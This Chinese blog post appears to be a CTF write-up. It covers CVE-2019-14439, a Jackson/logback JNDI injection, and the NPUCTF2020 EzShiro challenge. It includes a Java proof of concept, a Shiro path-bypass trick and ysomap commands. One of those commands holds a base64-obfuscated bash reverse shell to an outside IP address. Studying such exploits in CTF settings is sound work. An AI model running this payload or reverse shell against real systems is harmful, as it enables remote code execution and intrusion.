CVE-2019-14439
是由logback 引起的 jndi 注入,找不到詳細分析的文章,對著網上的poc簡單看了一下,
在ch.qos.logback.core.db.JNDIConnectionSource這個類里
漏洞原理并不復雜,很清晰明了的jndi注入,
poc
package Jackson;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class logback {
public static void main(String[] args) throws IOException, IOException {
String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\"," +
"{\"jndiLocation\":\"ldap://127.0.0.1:1089/Exploit\"}]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
Object o = mapper.readValue(json, Object.class);
mapper.writeValueAsString(o);
}
}
[NPUCTF2020]EzShiro
一開始沒做出來,后來看wp知道附件有pom.xml buu似乎沒給
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.apache.shiro</groupId>
<artifactId>shiro-web</artifactId>
<version>1.5.1</version>
</dependency>
<dependency>
<groupId>org.apache.shiro</groupId>
<artifactId>shiro-spring</artifactId>
<version>1.5.1</version>
</dependency>
<dependency>
<groupId>ch.qos.logback</groupId>
<artifactId>logback-core</artifactId>
<version>1.2.1</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
看到有logback 先是shiro的權限繞過來到/json,訪問/;/json
post一個true看到Jackson
jackson+logback 應該就是CVE-2019-14439了,原始碼應該是用jackson對post的json資料進行反序列化
但遇到個問題,我直接打沒有打通,這里好像還需要繞限制,
看了看wp,參考的是這個,文章里有提到
https://paper.seebug.org/942/#ldapgadget
應該是題目jvm版本太高了,得加載題目自帶的鏈子,看到pom里有commons-collections
wp里直接用ysomap工具了,還沒在比賽里用過這個工具,順帶學一學,
https://github.com/wh1t3p1g/ysomap
use exploit LDAPLocalChainListener
set lport 6688
use payload CommonsCollections8
use bullet TransformerBullet
set version 3
set command 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
run
使用這工具必須的是jdk8,并且jdk8版本不能過低
能彈成功,期末考完去研究一下工具原始碼
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/390719.html
標籤:其他
上一篇:S抽取Mysql